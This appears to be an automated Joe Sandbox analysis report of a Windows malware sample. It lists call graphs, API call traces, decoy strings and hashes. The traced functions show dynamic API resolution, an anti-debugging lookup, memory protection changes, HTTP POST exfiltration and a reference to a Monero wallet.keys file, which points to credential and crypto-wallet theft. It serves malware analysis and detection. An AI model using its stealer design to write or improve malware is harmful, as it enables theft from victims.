StrCmpCA 16015->16016 16017 46522f 16016->16017 16018 4658c4 InternetCloseHandle 16017->16018 16019 478b60 3 API calls 16017->16019 16025 4658d9 codecvt 16018->16025 16020 46524e 16019->16020 16021 47a920 3 API calls 16020->16021 16022 465261 16021->16022 16023 47a8a0 lstrcpy 16022->16023 16024 46526a 16023->16024 16026 47a9b0 4 API calls 16024->16026 16029 47a7a0 lstrcpy 16025->16029 16027 4652ab 16026->16027 16028 47a920 3 API calls 16027->16028 16030 4652b2 16028->16030 16037 465913 16029->16037 16031 47a9b0 4 API calls 16030->16031 16032 4652b9 16031->16032 16033 47a8a0 lstrcpy 16032->16033 16034 4652c2 16033->16034 16035 47a9b0 4 API calls 16034->16035 16036 465303 16035->16036 16038 47a920 3 API calls 16036->16038 16037->15983 16039 46530a 16038->16039 16040 47a8a0 lstrcpy 16039->16040 16041 465313 16040->16041 16042 465329 InternetConnectA 16041->16042 16042->16018 16043 465359 HttpOpenRequestA 16042->16043 16045 4658b7 InternetCloseHandle 16043->16045 16046 4653b7 16043->16046 16045->16018 16047 47a9b0 4 API calls 16046->16047 16048 4653cb 16047->16048 16049 47a8a0 lstrcpy 16048->16049 16050 4653d4 16049->16050 16051 47a920 3 API calls 16050->16051 16052 4653f2 16051->16052 16053 47a8a0 lstrcpy 16052->16053 16054 4653fb 16053->16054 16055 47a9b0 4 API calls 16054->16055 16056 46541a 16055->16056 16057 47a8a0 lstrcpy 16056->16057 16058 465423 16057->16058 16059 47a9b0 4 API calls 16058->16059 16060 465444 16059->16060 16061 47a8a0 lstrcpy 16060->16061 16062 46544d 16061->16062 16063 47a9b0 4 API calls 16062->16063 16064 46546e 16063->16064 16065 47a8a0 lstrcpy 16064->16065 16157 478ead CryptBinaryToStringA 16156->16157 16158 478ea9 16156->16158 16157->16158 16159 478ece GetProcessHeap RtlAllocateHeap 16157->16159 16158->16002 16159->16158 16160 478ef4 codecvt 16159->16160 16161 478f05 CryptBinaryToStringA 16160->16161 16161->16158 16165->15438 16408 469880 16166->16408 16168 4698e1 16168->15445 16170 47a740 lstrcpy 16169->16170 16343 47a740 lstrcpy 16342->16343 16344 470266 16343->16344 16345 478de0 2 API calls 16344->16345 16346 47027b 16345->16346 16347 47a920 3 API calls 16346->16347 16348 47028b 16347->16348 16349 47a8a0 lstrcpy 16348->16349 16350 470294 16349->16350 16351 47a9b0 4 API calls 16350->16351 16409 46988e 16408->16409 16412 466fb0 16409->16412 16411 4698ad codecvt 16411->16168 16415 466d40 16412->16415 16416 466d63 16415->16416 16429 466d59 16415->16429 16431 466530 16416->16431 16420 466dbe 16420->16429 16441 4669b0 16420->16441 16422 466e2a 16423 466ee6 VirtualFree 16422->16423 16425 466ef7 16422->16425 16422->16429 16423->16425 16424 466f41 16426 4789f0 2 API calls 16424->16426 16424->16429 16425->16424 16427 466f26 FreeLibrary 16425->16427 16428 466f38 16425->16428 16426->16429 16427->16425 16430 4789f0 2 API calls 16428->16430 16429->16411 16430->16424 16432 466542 16431->16432 16434 466549 16432->16434 16451 478a10 GetProcessHeap RtlAllocateHeap 16432->16451 16434->16429 16435 466660 16434->16435 16438 46668f VirtualAlloc 16435->16438 16437 466730 16439 466743 VirtualAlloc 16437->16439 16440 46673c 16437->16440 16438->16437 16438->16440 16439->16440 16440->16420 16442 4669c9 16441->16442 16446 4669d5 16441->16446 16443 466a09 LoadLibraryA 16442->16443 16442->16446 16444 466a32 16443->16444 16443->16446 16448 466ae0 16444->16448 16452 478a10 GetProcessHeap RtlAllocateHeap 16444->16452 16446->16422 16447 466ba8 GetProcAddress 16447->16446 16447->16448 16448->16446 16448->16447 16449 4789f0 2 API calls 16449->16448 16450 466a8b 16450->16446 16450->16449 16451->16434 16452->16450

                      Executed Functions

                      Function 00479860 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 212libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 747 479860-479874 call 479750 750 479a93-479af2 LoadLibraryA * 5 747->750 751 47987a-479a8e call 479780 GetProcAddress * 21 747->751 753 479af4-479b08 GetProcAddress 750->753 754 479b0d-479b14 750->754 751->750 753->754 755 479b46-479b4d 754->755 756 479b16-479b41 GetProcAddress * 2 754->756 758 479b4f-479b63 GetProcAddress 755->758 759 479b68-479b6f 755->759 756->755 758->759 760 479b71-479b84 GetProcAddress 759->760 761 479b89-479b90 759->761 760->761 762 479b92-479bbc GetProcAddress * 2 761->762 763 479bc1-479bc2 761->763 762->763
                      APIs
                      • GetProcAddress.KERNEL32(75900000,00E807C8), ref: 004798A1
                      • GetProcAddress.KERNEL32(75900000,00E807F8), ref: 004798BA
                      • GetProcAddress.KERNEL32(75900000,00E80810), ref: 004798D2
                      • GetProcAddress.KERNEL32(75900000,00E805A0), ref: 004798EA
                      • GetProcAddress.KERNEL32(75900000,00E80840), ref: 00479903
                      • GetProcAddress.KERNEL32(75900000,00E88BA0), ref: 0047991B
                      • GetProcAddress.KERNEL32(75900000,00E765C0), ref: 00479933
                      • GetProcAddress.KERNEL32(75900000,00E762A0), ref: 0047994C
                      • GetProcAddress.KERNEL32(75900000,00E806F0), ref: 00479964
                      • GetProcAddress.KERNEL32(75900000,00E80648), ref: 0047997C
                      • GetProcAddress.KERNEL32(75900000,00E80708), ref: 00479995
                      • GetProcAddress.KERNEL32(75900000,00E80558), ref: 004799AD
                      • GetProcAddress.KERNEL32(75900000,00E76480), ref: 004799C5
                      • GetProcAddress.KERNEL32(75900000,00E80570), ref: 004799DE
                      • GetProcAddress.KERNEL32(75900000,00E80588), ref: 004799F6
                      • GetProcAddress.KERNEL32(75900000,00E763C0), ref: 00479A0E
                      • GetProcAddress.KERNEL32(75900000,00E805B8), ref: 00479A27
                      • GetProcAddress.KERNEL32(75900000,00E80870), ref: 00479A3F
                      • GetProcAddress.KERNEL32(75900000,00E764C0), ref: 00479A57
                      • GetProcAddress.KERNEL32(75900000,00E80888), ref: 00479A70
                      • GetProcAddress.KERNEL32(75900000,00E76400), ref: 00479A88
                      • LoadLibraryA.KERNEL32(00E80900,?,00476A00), ref: 00479A9A
                      • LoadLibraryA.KERNEL32(00E808A0,?,00476A00), ref: 00479AAB
                      • LoadLibraryA.KERNEL32(00E808E8,?,00476A00), ref: 00479ABD
                      • LoadLibraryA.KERNEL32(00E808D0,?,00476A00), ref: 00479ACF
                      • LoadLibraryA.KERNEL32(00E808B8,?,00476A00), ref: 00479AE0
                      • GetProcAddress.KERNEL32(75070000,00E80918), ref: 00479B02
                      • GetProcAddress.KERNEL32(75FD0000,00E80858), ref: 00479B23
                      • GetProcAddress.KERNEL32(75FD0000,00E88DC0), ref: 00479B3B
                      • GetProcAddress.KERNEL32(75A50000,00E88D00), ref: 00479B5D
                      • GetProcAddress.KERNEL32(74E50000,00E76360), ref: 00479B7E
                      • GetProcAddress.KERNEL32(76E80000,00E88A00), ref: 00479B9F
                      • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00479BB6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess$`c
                      • API String ID: 2238633743-1585215645
                      • Opcode ID: a86a764a79c88195e6165f9bdd55aeda04ca4e3213eaf4f79ec1116cfda364e9
                      • Instruction ID: 88bef62ee63f4bcc776bfdfc2886e82a53414849cead6942b7ce4c9a593b5ad2
                      • Opcode Fuzzy Hash: a86a764a79c88195e6165f9bdd55aeda04ca4e3213eaf4f79ec1116cfda364e9
                      • Instruction Fuzzy Hash: FCA12AB9500250AFD394FFE8ED88AA637FBF74B201714A61BE60583265D739B841CF52
                      Function 004645C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 764 4645c0-464695 RtlAllocateHeap 781 4646a0-4646a6 764->781 782 46474f-4647a9 VirtualProtect 781->782 783 4646ac-46474a 781->783 783->781
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0046460F
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0046479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464770
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464657
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464713
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004645C7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464683
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464638
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464643
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464765
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0046462D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004646C2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464617
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464622
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004646B7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004645F3
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0046471E
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004646AC
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0046477B
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0046466D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004645D2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0046473F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464662
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004645DD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464729
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004646D8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004646CD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0046475A
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464734
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004645E8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00464678
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0046474F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: 112af7c8d25c565725d371fee94c8a8986110fb840c166cdc8ab4b1e9f37fc1b
                      • Instruction ID: 4a6562d5d55d7cd0a682a7dcf8d62d138677099f9cb6274f8c68d84b42ef8eaa
                      • Opcode Fuzzy Hash: 112af7c8d25c565725d371fee94c8a8986110fb840c166cdc8ab4b1e9f37fc1b
                      • Instruction Fuzzy Hash: 2741E2707C2704FBE626B7A4A8C2F9D7756DFCA708FB05846EA00526C0CBAC754047BA
                      Function 00464880 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479networkstringfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 801 464880-464942 call 47a7a0 call 4647b0 call 47a740 * 5 InternetOpenA StrCmpCA 816 464944 801->816 817 46494b-46494f 801->817 816->817 818 464955-464acd call 478b60 call 47a920 call 47a8a0 call 47a800 * 2 call 47a9b0 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a920 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a9b0 call 47a920 call 47a8a0 call 47a800 * 2 InternetConnectA 817->818 819 464ecb-464ef3 InternetCloseHandle call 47aad0 call 469ac0 817->819 818->819 905 464ad3-464ad7 818->905 829 464ef5-464f2d call 47a820 call 47a9b0 call 47a8a0 call 47a800 819->829 830 464f32-464fa2 call 478990 * 2 call 47a7a0 call 47a800 * 8 819->830 829->830 906 464ae5 905->906 907 464ad9-464ae3 905->907 908 464aef-464b22 HttpOpenRequestA 906->908 907->908 909 464ebe-464ec5 InternetCloseHandle 908->909 910 464b28-464e28 call 47a9b0 call 47a8a0 call 47a800 call 47a920 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a920 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a920 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a9b0 call 47a8a0 call 47a800 call 47a920 call 47a8a0 call 47a800 call 47a740 call 47a920 * 2 call 47a8a0 call 47a800 * 2 call 47aad0 lstrlen call 47aad0 * 2 lstrlen call 47aad0 HttpSendRequestA 908->910 909->819 1021 464e32-464e5c InternetReadFile 910->1021 1022 464e67-464eb9 InternetCloseHandle call 47a800 1021->1022 1023 464e5e-464e65 1021->1023 1022->909 1023->1022 1024 464e69-464ea7 call 47a9b0 call 47a8a0 call 47a800 1023->1024 1024->1021
                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00464839
                        • Part of subcall function 004647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00464849
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00464915
                      • StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 0046493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00464ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00480DDB,00000000,?,?,00000000,?,",00000000,?,00E8E3F0), ref: 00464DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00464E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00464E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00464E49
                      • InternetCloseHandle.WININET(00000000), ref: 00464EAD
                      • InternetCloseHandle.WININET(00000000), ref: 00464EC5
                      • HttpOpenRequestA.WININET(00000000,00E8E270,?,00E8DCF8,00000000,00000000,00400100,00000000), ref: 00464B15
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • InternetCloseHandle.WININET(00000000), ref: 00464ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------$p
                      • API String ID: 460715078-242323141
                      • Opcode ID: a5dd5d7ced7cb965675491fd3b4cd4d939e6c7f0f4db21a48456b986f110201a
                      • Instruction ID: 70ef84bcfb56b942fa9088642518229fbb5e121193e992a794fd2350857230f3
                      • Opcode Fuzzy Hash: a5dd5d7ced7cb965675491fd3b4cd4d939e6c7f0f4db21a48456b986f110201a
                      • Instruction Fuzzy Hash: 7B1244B19101189ADB14FBA1CC52FEE7338BF94304F50859EB11A62091DF782F59CF6A
                      Function 00477850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004611B7), ref: 00477880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00477887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0047789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: 84fc16b387dfe1352d71d39aba83697e444e060a8b2069c25e66c614c90e574a
                      • Instruction ID: 42217b52d124cd9a45e9faa1694d1129dd8d8adb878acb9ee781397b6cba406e
                      • Opcode Fuzzy Hash: 84fc16b387dfe1352d71d39aba83697e444e060a8b2069c25e66c614c90e574a
